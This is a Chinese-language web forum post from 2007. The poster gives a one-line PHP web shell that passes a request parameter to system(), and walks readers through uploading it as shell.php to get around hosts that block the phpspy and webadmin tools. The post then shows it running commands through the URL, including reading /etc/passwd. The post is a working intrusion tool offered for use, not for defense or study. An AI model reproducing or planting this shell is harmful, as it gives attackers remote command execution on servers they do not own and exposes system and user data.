Board logo

标题: phpspy和webadmin都不能用,如何解决? [打印本页]

作者: txfzq     时间: 2007-11-15 15:16    标题: phpspy和webadmin都不能用,如何解决?

由于我们大量的使用这两个程序导致许多空间对这两个程序做了限制,要么传上去不能用,要么根本就不让你传,其实只要服务器没有禁止system等函数的话,一般来说shell还是可以实现的
下面丢一个号称最小的shell代码
<? system(\$_REQUEST['cmd']); ?>
只有一句代码可谓短小精悍
将这个代码另存为shell.php(当然你也可以用别的文件名),传到服务器
运行:http://url/shell.php?cmd=命令
如:http://url/shell.php?cmd=cat /etc/passwd

注意使用这个工具查看php和html等文件的时候,文件内容不会直接显示出来,这时只要查看源文件,文件内容就可以看到了

同时建议大家多4一下别的shell程序,如果实在没有可以用的,就只能放弃了




欢迎光临 骤雨打新荷 (http://txfzq.free.fr/bbs/) Powered by Discuz! 2.5